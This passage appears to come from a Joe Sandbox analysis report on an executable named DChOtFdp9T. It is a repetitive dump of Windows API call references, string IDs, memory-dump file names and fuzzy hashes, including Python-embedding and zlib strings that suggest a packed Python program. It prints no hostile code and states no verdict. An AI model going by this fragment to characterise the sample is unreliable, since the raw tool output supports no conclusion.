                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(00000000,?,00007FF60299324C,?,?,00007FF602993964), ref: 00007FF602997592
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateDirectory
                                                                                                                                                                                                                            • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                            • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6029ABDCB), ref: 00007FF6029ABEFC
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6029ABDCB), ref: 00007FF6029ABF87
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4170891091-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2780335769-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1279662727-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3251591375-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6029A4899), ref: 00007FF6029A49B7
                                                                                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6029A4899), ref: 00007FF6029A49CD
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97DE
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97E8
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?,?,?,00007FF6029A9855,?,?,00000000,00007FF6029A990A), ref: 00007FF6029A9A46
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6029A9855,?,?,00000000,00007FF6029A990A), ref: 00007FF6029A9A50
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 918212764-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _fread_nolock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 840049012-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3947729631-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
• Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029AC47C: HeapAlloc.KERNEL32(?,?,?,00007FF60299FD00,?,?,?,00007FF6029A136A,?,?,?,?,?,00007FF6029A2B59), ref: 00007FF6029AC4BA
                                                                                                                                                                                                                            • RtlReAllocateHeap.NTDLL(?,?,00000000,00007FF6029B21BB,?,?,?,00007FF6029A8DD7,?,?,?,00007FF6029A8CCD,?,?,?,00007FF6029A90AE), ref: 00007FF6029B6CC1
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Heap$AllocAllocate
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2177240990-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,00000000,00007FF6029AA1AA,?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A), ref: 00007FF6029ADA6D
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,?,00007FF60299FD00,?,?,?,00007FF6029A136A,?,?,?,?,?,00007FF6029A2B59), ref: 00007FF6029AC4BA
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                                            • Opcode ID: 139518de3d1453d714993cc24149baa1dfebbcba10148b546485c74ee49a4d3a
                                                                                                                                                                                                                            • Instruction ID: 813fd263b8c7434dfa10ab1665f6b39bce1b60ec868ca1c8abfc976c563b0b4b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 139518de3d1453d714993cc24149baa1dfebbcba10148b546485c74ee49a4d3a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46F0EC01F0D30386FF1827B3480127419D09F547A8F380631DC2ECA6C3DEECA04082A4
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF6029950A0
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF6029950E1
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF602995106
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF60299512B
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF602995153
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF60299517B
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF6029951A3
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF6029951CB
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF6029951F3
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                            • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                            • API String ID: 190572456-2007157414
                                                                                                                                                                                                                            • Opcode ID: 9ce22c7e3f960430e7b86c5184534ff0638df419cfc570d1de65ba3543624de3
                                                                                                                                                                                                                            • Instruction ID: 8d03703544bf227b1785009ca476e9f0aaa7ce48e410fdc29011545e5a774c2b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ce22c7e3f960430e7b86c5184534ff0638df419cfc570d1de65ba3543624de3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B12B464D0EB0394FA17DB5BA9601B52BA0EF0976CFB51435CC4E822A3EFFCB5589241
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                            • API String ID: 808467561-2761157908
                                                                                                                                                                                                                            • Opcode ID: d9dc8ea0acb79e4d9ef06eae9a23494848faa6b1b0caf618c0fc867066338a3a
                                                                                                                                                                                                                            • Instruction ID: fa1493fbf93f4063572f78fa11e72b40aa03bb8182008ff223a01974341b7803
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9dc8ea0acb79e4d9ef06eae9a23494848faa6b1b0caf618c0fc867066338a3a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17B2D272E182928BE726CE66D6407FD3BA1FF4474CF605135DA0D97A86DFB8A900CB44
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                            • API String ID: 0-2665694366
                                                                                                                                                                                                                            • Opcode ID: 4ac7e92f7a16b85862356adff5b5bf67b866f2e7e6eb7a58b17fdcce6a0c6e8c
                                                                                                                                                                                                                            • Instruction ID: 0e14b480c58b883aad81e78dccfa5270cfefbd633867f225b2065b569fa43c4f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ac7e92f7a16b85862356adff5b5bf67b866f2e7e6eb7a58b17fdcce6a0c6e8c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7352F472A186A68BE7648F1AC458B7D3FA9FF45358F214139EA4A83781DF7DD850CB00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                                                            • Opcode ID: 9f6baad40be0772a1e05760420ea0be94be042065400a08498f8ed995d511e67
                                                                                                                                                                                                                            • Instruction ID: b3c8c0dcc5573f37e12b5d3b13e0f0639a4fc5203dfbe35ad54bfc16f106b6a8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f6baad40be0772a1e05760420ea0be94be042065400a08498f8ed995d511e67
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F318372A08B818AEB608F65E8403ED7760FB88708F14403ADB4E87B95EF78C548C714
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$ErrorFormatLast
                                                                                                                                                                                                                            • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                                                                                                                                                            • API String ID: 3971115935-1149178304
                                                                                                                                                                                                                            • Opcode ID: d00ec6383bd8b73c4dfe21231a51a90c9ec44ada26203f5ebac8043cfa901d1d
                                                                                                                                                                                                                            • Instruction ID: 2baa6b743cd14df1a889a36e9120847630a5caa08db5a6047544937fc12f6445
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d00ec6383bd8b73c4dfe21231a51a90c9ec44ada26203f5ebac8043cfa901d1d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2217172618B8192E720DB16F4502EA77A4FF88788F500136EBCD93A99DFBCD156CB40
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
• Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                                                            • Opcode ID: 5709618119bebde8496f8e644cc76075d364222d75f9466c7edde4c64b387a7a
                                                                                                                                                                                                                            • Instruction ID: 473e776ca4a0da1be46635b09a98adb17e9258ed79e37ce808dc9466ed9fa121
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5709618119bebde8496f8e644cc76075d364222d75f9466c7edde4c64b387a7a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44317332A18B8186EB64CF26E8402AE77A4FF89758F640135EA9D83B55DF7CD155CB00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2227656907-0
                                                                                                                                                                                                                            • Opcode ID: 1c39f03ef33399cc6d1c661914213a4cb72856eeaff424b861eea07ba9b08e80
                                                                                                                                                                                                                            • Instruction ID: 43dec1153114443a90cbb98cffd05cc0ef5a5f2f3dfc8f0d009abe95d52661df
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c39f03ef33399cc6d1c661914213a4cb72856eeaff424b861eea07ba9b08e80
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BB1D622B1869241FE629B27E6001BE6B90FF54BE8F645131EA5D87BC6DFBCE441C740
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                                                            • Opcode ID: 3bc73cc68af297474fab7335d34c7ca35ab92d27d4957ccf63133921774b26e3
                                                                                                                                                                                                                            • Instruction ID: 2e52023be74b661de9da9fea0a7cd0cfabb313305cf0ce80c5604d4f41072ec3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3bc73cc68af297474fab7335d34c7ca35ab92d27d4957ccf63133921774b26e3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D118E32B14F028AEB00CF65E8542B837A4FB59B6CF240E35DA2D867A5DFBCD1948340
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memcpy_s
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1502251526-0
                                                                                                                                                                                                                            • Opcode ID: d90441c8661e5c6fa34eff5dbe8e25492f192de097943eb307aa0e87c9fb1e72
                                                                                                                                                                                                                            • Instruction ID: 46c28dc9fc80b964fc3f4fa8fcbb7d1b83a96bb6d507be7af55739bef80da770
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d90441c8661e5c6fa34eff5dbe8e25492f192de097943eb307aa0e87c9fb1e72
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6C10672B1828687E725CF17A14466ABB91FB84B88F648135DF4E83785DF7DE801CB40
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                            • API String ID: 0-1127688429
                                                                                                                                                                                                                            • Opcode ID: 4dc8512611bc38712c0a70c769346940f3f81a1d31e568b8746cdea38bafbf0a
                                                                                                                                                                                                                            • Instruction ID: 96a606fd9bc475660db3c34ef580560c1fbeac6c74a9ab78e946f382ff1ba8ff
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4dc8512611bc38712c0a70c769346940f3f81a1d31e568b8746cdea38bafbf0a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9F19D72A182C58FF7A58F1EC088A3A3EA9FF45758F25453CDA4986792CFB8E550C740
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 15204871-0
                                                                                                                                                                                                                            • Opcode ID: cb592c48bd29cba42889b287172e36f63e22e9bf4f9fc8b2089a15a6dc159fb1
                                                                                                                                                                                                                            • Instruction ID: 1171abed63db55aafe7817b322813b71e7dd35981f02a0b023706cfb6607fcac
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb592c48bd29cba42889b287172e36f63e22e9bf4f9fc8b2089a15a6dc159fb1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5BB16D77A04B898BEB16CF2AC94636C7BA4FB48B4CF248921DA5D837A5CF79D451C700
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
